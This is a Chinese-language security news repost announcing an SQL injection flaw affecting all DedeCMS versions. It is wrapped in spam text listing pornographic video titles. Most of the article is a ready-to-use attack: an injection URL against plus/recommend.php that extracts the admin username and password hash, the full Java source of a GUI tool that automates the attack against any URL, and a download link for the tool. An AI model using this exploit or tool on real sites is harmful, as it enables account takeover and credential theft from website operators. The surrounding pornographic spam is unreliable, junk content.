国产精品电影_久久视频免费_欧美日韩国产激情_成年人视频免费在线播放_日本久久亚洲电影_久久都是精品_66av99_九色精品美女在线_蜜臀a∨国产成人精品_冲田杏梨av在线_欧美精品在线一区二区三区_麻豆mv在线看

DedeCMS全版本通殺SQL注入漏洞利用代碼及工具

安全 漏洞
近日,網友在dedecms中發現了全版本通殺的SQL注入漏洞,目前官方最新版已修復該漏洞。

dedecms即織夢(PHP開源網站內容管理系統)。織夢內容管理系統(DedeCms) 以簡單、實用、開源而聞名,是國內最知名的PHP開源網站管理系統,也是使用用戶最多的PHP類CMS系統。

DedeCMS全版本通殺SQL注入漏洞利用代碼及工具

近日,網友在dedecms中發現了全版本通殺的SQL注入漏洞,目前官方最新版已修復該漏洞,相關利用代碼如下:

EXP:

Exp:plus/recommend.php?action=&aid=1&_FILES[type][tmp_name]=\'

or mid=@`\'` /*!50000union*//*!50000select*/1,2,3,(select

CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`

limit+0,1),5,6,7,8,9%23@`\'`+&_FILES[type][name]=1.jpg&_FILES[type]

[type]=application/octet-stream&_FILES[type][size]=111

利用工具源碼(by 園長):

package org.javaweb.dede.ui;
 
import java.awt.Toolkit;
import java.io.BufferedReader;
import java.io.InputStreamReader;
import java.net.URL;
import java.util.regex.Matcher;
import java.util.regex.Pattern;
 
/**
 *
 * @author yz
 */
public class MainFrame extends javax.swing.JFrame {
 
    private static final long serialVersionUID = 1L;
 
    /**
     * Creates new form MainFrame
     */
    public MainFrame() {
        initComponents();
    }
 
    public String request(String url){
        String str = "",tmp;
        try {
            BufferedReader br = new BufferedReader(new InputStreamReader(new URL(url).openStream()));
            while((tmp=br.readLine())!=null){
                str+=tmp+"\r\n";
            }
        } catch (Exception e) {
            jTextArea1.setText(e.toString());
        }
        return str;
    }
 
    private void initComponents() {
 
        jPanel1 = new javax.swing.JPanel();
        jLabel1 = new javax.swing.JLabel();
        jTextField1 = new javax.swing.JTextField();
        jButton1 = new javax.swing.JButton();
        jScrollPane1 = new javax.swing.JScrollPane();
        jTextArea1 = new javax.swing.JTextArea();
 
        setDefaultCloseOperation(javax.swing.WindowConstants.EXIT_ON_CLOSE);
 
        jLabel1.setText("URL:");
        jTextField1.setText("http://localhost");
 
        this.setTitle("DedeCms recommend.php注入利用工具-p2j.cn");
 
        int screenWidth = Toolkit.getDefaultToolkit().getScreenSize().width;
        int screenHeight = Toolkit.getDefaultToolkit().getScreenSize().height;
        this.setBounds(screenWidth / 2 - 229, screenHeight / 2 - 158, 458, 316);
 
        jButton1.setText("獲取");
        jButton1.addActionListener(new java.awt.event.ActionListener() {
            public void actionPerformed(java.awt.event.ActionEvent evt) {
                jButton1ActionPerformed(evt);
            }
        });
 
        jTextArea1.setColumns(20);
        jTextArea1.setRows(5);
        jScrollPane1.setViewportView(jTextArea1);
 
        javax.swing.GroupLayout jPanel1Layout = new javax.swing.GroupLayout(jPanel1);
        jPanel1.setLayout(jPanel1Layout);
        jPanel1Layout.setHorizontalGroup(
            jPanel1Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING)
            .addGroup(jPanel1Layout.createSequentialGroup()
                .addGroup(jPanel1Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.TRAILING, false)
                    .addComponent(jScrollPane1, javax.swing.GroupLayout.Alignment.LEADING)
                    .addGroup(javax.swing.GroupLayout.Alignment.LEADING, jPanel1Layout.createSequentialGroup()
                        .addContainerGap()
                        .addComponent(jLabel1)
                        .addPreferredGap(javax.swing.LayoutStyle.ComponentPlacement.RELATED)
                        .addComponent(jTextField1, javax.swing.GroupLayout.PREFERRED_SIZE, 331, javax.swing.GroupLayout.PREFERRED_SIZE)
                        .addPreferredGap(javax.swing.LayoutStyle.ComponentPlacement.RELATED)
                        .addComponent(jButton1, javax.swing.GroupLayout.PREFERRED_SIZE, 83, javax.swing.GroupLayout.PREFERRED_SIZE)))
                .addGap(0, 0, Short.MAX_VALUE))
        );
        jPanel1Layout.setVerticalGroup(
            jPanel1Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING)
            .addGroup(jPanel1Layout.createSequentialGroup()
                .addContainerGap()
                .addGroup(jPanel1Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.BASELINE)
                    .addComponent(jLabel1)
                    .addComponent(jTextField1,
 javax.swing.GroupLayout.PREFERRED_SIZE,
javax.swing.GroupLayout.DEFAULT_SIZE,
javax.swing.GroupLayout.PREFERRED_SIZE)
                    .addComponent(jButton1))
                .addPreferredGap(javax.swing.LayoutStyle.ComponentPlacement.RELATED)
                .addComponent(jScrollPane1, javax.swing.GroupLayout.DEFAULT_SIZE, 254, Short.MAX_VALUE))
        );
 
        javax.swing.GroupLayout layout = new javax.swing.GroupLayout(getContentPane());
        getContentPane().setLayout(layout);
        layout.setHorizontalGroup(
            layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING)
            .addComponent(jPanel1, javax.swing.GroupLayout.DEFAULT_SIZE, javax.swing.GroupLayout.DEFAULT_SIZE, Short.MAX_VALUE)
        );
        layout.setVerticalGroup(
            layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING)
            .addComponent(jPanel1, javax.swing.GroupLayout.DEFAULT_SIZE, javax.swing.GroupLayout.DEFAULT_SIZE, Short.MAX_VALUE)
        );
 
        pack();
    }// </editor-fold>                      
 
    private void jButton1ActionPerformed(java.awt.event.ActionEvent evt) {                                       
        String url = jTextField1.getText();
        if(null==url||"".equals(url)){
            return ;
        }
        String result = request(url+"/plus/recommend.php?action=&aid=1&_FILES[type][tmp_name]=\\%27%20or%20mid=@`\\%27`%20/*!50000union*//*!50000select*/1,2,3,(select%20CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`%20limit+0,1),5,6,7,8,9%23@`\\%27`+&_FILES[type][name]=1.jpg&_FILES[type][type]=application/octet-stream&_FILES[type][size]=4294");
        Matcher m = Pattern.compile("<h2>(.*)</h2>").matcher(result);
        if(m.find()){
            String[] s = m.group(1).split("\\|");
            if(s.length>2){
                jTextArea1.setText("UserName:"+s[1]+"\r\nMD5:"+s[2].substring(3,s[2].length()-1));
            }
        }
    }                                      
 
    public static void main(String args[]) {
        java.awt.EventQueue.invokeLater(new Runnable() {
            public void run() {
                new MainFrame().setVisible(true);
            }
        });
    }
 
    // Variables declaration - do not modify                   
    private javax.swing.JButton jButton1;
    private javax.swing.JLabel jLabel1;
    private javax.swing.JPanel jPanel1;
    private javax.swing.JScrollPane jScrollPane1;
    private javax.swing.JTextArea jTextArea1;
    private javax.swing.JTextField jTextField1;
    // End of variables declaration                 
}

利用工具下載地址 http://pan.baidu.com/s/1sj31RLN (本站提供程序(方法)可能帶有攻擊性,僅供安全研究與教學之用,風險自負!)

責任編輯:藍雨淚 來源: FreeBuf
相關推薦

2012-04-12 15:06:44

2023-12-01 16:21:42

2017-09-07 15:39:27

2014-12-04 15:01:13

2014-10-17 09:12:35

2010-09-13 13:40:24

2024-05-27 09:04:05

2012-12-19 10:36:06

2016-09-28 16:38:47

2017-05-02 09:02:14

2010-09-09 17:22:14

2010-10-22 15:18:18

SQL注入漏洞

2009-02-12 10:14:16

2009-11-02 13:47:09

2009-10-25 13:32:09

2021-09-16 09:05:45

SQL注入漏洞網絡攻擊

2012-04-12 13:36:59

2023-07-26 17:13:38

2012-11-15 13:37:32

dedecms注入腳本攻防

2024-05-08 16:32:35

點贊
收藏

51CTO技術棧公眾號

国产一区二区久久久| 亚洲国产欧美在线成人app| 久久久久久国产精品免费免费| 日韩精品一区二区三区中文| 7777精品伊人久久久大香线蕉| 91精品国产91久久久久久不卡| 亚洲桃花岛网站| 天堂社区 天堂综合网 天堂资源最新版| 国产三级伦理在线| 国内成+人亚洲+欧美+综合在线| 尤物九九久久国产精品的特点 | 国产精品久久久久久精| 福利片一区二区| 亚洲精品国久久99热| 国产精品久久久久久搜索 | 亚洲精品国偷自产在线99热| 亚洲一区二区三区免费看 | 亚洲欧美另类人妖| 日韩欧美中文在线观看| 国产美女精彩久久| 成人羞羞在线观看网站| 欧美理论电影在线播放| 国产一区二区av在线| 中文字幕国产亚洲2019| 午夜免费福利在线观看| 国产精品久久久久7777按摩| 99热99在线| 亚洲乱亚洲乱妇无码| 超碰地址久久| 91久久国产婷婷一区二区| 韩国欧美国产1区| 国产精品久久中文字幕| 日本在线不卡视频| 国产免费视频传媒| 日本va欧美va精品| 国产精品视频免费在线观看| 国产传媒在线| 亚洲成人xxx| 91福利国产在线观看菠萝蜜| 18欧美亚洲精品| 成人3d动漫一区二区三区| 亚洲人成毛片在线播放女女| 中文字幕亚洲二区| 在线三级电影| 91精品国产综合久久精品| 九色在线观看| 亚洲视频在线观看免费| 在线成人av| 理论片午夜视频在线观看| 久草在线免费福利| 国产中文一区二区| 欧美性videos高清精品| 芒果视频成人app| 国产成人精品免费视频| 成人激情av网| 777电影在线观看| 高清视频在线观看一区| 精品人人人人| www 成人av com| 日本v片在线高清不卡在线观看| 久久久成人精品一区二区三区 | 亚洲色图欧美激情| 国产美女av在线| 久久久在线观看| 国产乱对白刺激视频不卡| 国产在线精品一区二区三区| 国产精品乡下勾搭老头1| 高清hd写真福利在线播放| 欧美中文字幕一区二区三区亚洲| 美丽的姑娘在线观看免费动漫| 91麻豆精品国产自产在线| 久久夜夜久久| 国产亚洲免费的视频看| 免费一级欧美在线观看视频| 精品无码一区二区三区爱欲| 国产精品久久久久影院亚瑟| 在线亚洲人成| 欧美激情亚洲综合一区| 波多野结衣一区二区三区| 超碰人人在线| 国产亚洲精品美女| 日韩欧美自拍| 影音先锋成人资源网站| 日本一区二区三级电影在线观看| 97人人在线视频| 亚洲春色在线| 亚洲少妇中文在线| 国产视频一区在线观看| 欧美精品一区二区三区中文字幕| 婷婷六月天丁香| 亚洲影院高清在线| 亚洲一区二区欧美激情| 欧美黄色三级| 欧美大片网址| 亚洲free嫩bbb| 色爱区综合激月婷婷| 日韩大陆av| 成年人黄视频网站| 精品国产_亚洲人成在线| 日韩你懂的电影在线观看| 国产精品45p| 伊大人久久香线焦宗合一75大| 日韩激情在线视频| 91麻豆123| 在线精品一区二区| 日韩欧美中文字幕一区二区三区| 国产a级一级片| 97精品国产97久久久久久免费 | 色综合久综合久久综合久鬼88 | 男人亚洲天堂网| 亚洲在线免费观看| 原创国产精品91| 色综合av在线| 99免费精品视频| av不卡在线看| 9i看片成人免费高清| 国产对白在线| 97热精品视频官网| 日韩一区二区精品| 亚洲国产精品久久艾草纯爱| 国产一区二三区好的| 国产精品激情| 91亚洲无吗| 在线欧美一级视频| 国产1区2区在线| 国产99在线免费| 欧美一区二区大胆人体摄影专业网站| 日韩免费电影网站| 欧美亚男人的天堂| 一区二区三区欧美日韩| 久久久五月婷婷| 在线观看日韩av电影| rebdb初裸写真在线观看| 高清欧美精品xxxxx| 亚洲欧洲日韩综合二区| 国产精品一区二区久久精品| 一级毛片免费视频| 国产成人亚洲综合无码| 2019精品视频| 欧美激情第三页| 欧美黑人极品猛少妇色xxxxx| 日韩三级视频在线看| 国产精品青草久久| 亚洲影院一区| 99热精品在线观看| 在线一区视频| 99热这里有精品| av免费观看大全| 久久理论片午夜琪琪电影网| 亚洲网站在线播放| 亚洲天堂av图片| 日韩欧美国产小视频| 日韩国产欧美精品在线| 国产偷亚洲偷欧美偷精品| 欧美久久一二三四区| 色呦呦一区二区三区| 欧美色爱综合网| 欧美性jizz18性欧美| 亚洲国产成人高清精品| 在线精品视频免费播放| 亚州成人在线电影| 日韩欧美国产一区在线观看| 日韩精品免费一线在线观看| 中文字幕亚洲专区| 国产精品久久久久久久久久小说 | 亚洲伊人伊色伊影伊综合网| 欧美aⅴ一区二区三区视频| 精品久久成人| 日韩专区一卡二卡| 日韩精品一级中文字幕精品视频免费观看 | 国产精品网站在线看| 亚洲s色大片在线观看| 亚洲日本在线天堂| av7777777| 亚洲一区二区在线免费观看| 成人国产亚洲精品a区天堂华泰| 久久视频在线免费观看| 亚洲另类图片色| 亚洲男人第一av网站| 日韩精品综合一本久道在线视频| 亚洲欧美在线高清| 国产精品理伦片| 中文字幕av一区 二区| 成人国产精品免费网站| 综合色一区二区| 六月婷婷一区| 国色天香久久精品国产一区| 日本免费不卡一区二区| av一区二区三区免费| 成人自拍视频网站| 国产日韩欧美二区| 亚洲精品一区国产精品| 亚洲精品自在在线观看| 日韩av在线第一页| 熟女熟妇伦久久影院毛片一区二区| 在线视频不卡一区二区三区| 精品一区二区三区国产| 另类视频在线观看+1080p| 99久热在线精品视频| 国产成人福利网站|